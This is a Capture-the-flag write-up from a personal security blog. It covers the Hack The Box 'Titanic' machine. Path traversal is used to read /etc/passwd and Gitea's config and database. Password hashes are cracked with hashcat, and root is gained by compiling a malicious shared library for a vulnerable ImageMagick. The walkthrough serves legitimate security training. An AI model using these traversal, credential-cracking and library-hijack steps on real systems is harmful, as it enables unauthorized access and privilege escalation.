303 words
2 minutes
Titanic
2025-02-23
Hack The Box
CTF
/
Linux
/
Enumeration

Nmap Scan#

First, I performed an Nmap scan to identify open ports and running services:

Terminal window
sudo nmap -sC -sV -T4 10.10.11.55

nmap

Website Enumeration#

While exploring the website, I found a Book Your Trip button that triggers a form submission.

button

After filling out the form and intercepting the request with BurpSuite, I followed the redirection and discovered an endpoint vulnerable to Path Trasversal: /download?ticket=.

Path Traversal Exploit#

By attempting reading /etc/passwd, I found a user named developer pathtraversal and retrieved the user flag from:

/home/developer/user.txt

Subdomain Discovery#

I continued testing path traversal to access system files like /etc/hosts. I discovered a subdomain named dev.

dev

I added the subdomain to my /etc/hosts file

Exploiting Gitea for Credentials#

The server was running Gitea in the dev subdomain. I started enumerating for its configuration file, and I found it:

Terminal window
curl -X GET "http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/conf/app.ini"

config

By analyzing the configuration, I located the database at:

/data/gitea/gitea.db

accessed it using SQLite:

Terminal window
sqlite3 _home_developer_gitea_data_gitea_gitea.db

db

Cracking the Hash#

By default, Gitea uses PBKDF2-HMAC-SHA256 with a high iteration count for password hashing. It stores the salt and password hash as hex-encoded values in separate columns within the database. However, Hashcat requires a single string with base64-encoded segments for cracking.

So, I created a script that extracts user hashes from a Gitea SQLite database and converts them into a Hashcat-compatible format you can explore it here Gitea2Hashcat.

Terminal window
hashcat gitea.hashes /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt --user

and I retre=ived the password alt text

SSH Access#

Using the cracked password, I logged into the machine via SSH:

Terminal window
ssh developer@10.10.11.55

Privilege Escalation#

While exploring the system, I found a script running as root at /opt/scripts:

scripts

The script used an ImageMagick version vulnerable to Arbitrary Code Execution. A quick Google search led me to this PoC:

Arbitrary Code Execution in AppImage version ImageMagick

Terminal window
gcc -x c -shared -fPIC -o /opt/app/static/assets/images/libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


__attribute__((constructor)) void init(){
    system("cat /root/root.txt > /tmp/root44_flag.txt");
    exit(0);
}
EOF


touch test.jpg

Retrieving the Root Flag#

After triggering the exploit, I retrieved the root flag from /tmp/root44_flag.txt.

win

Titanic
https://dahmanisec.me/posts/titanic/
Author
Abderrahim Dahmani
Published at
2025-02-23
License
CC BY-NC-SA 4.0
Takedown
TFC CTF 2024
© 2025 Abderrahim Dahmani. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari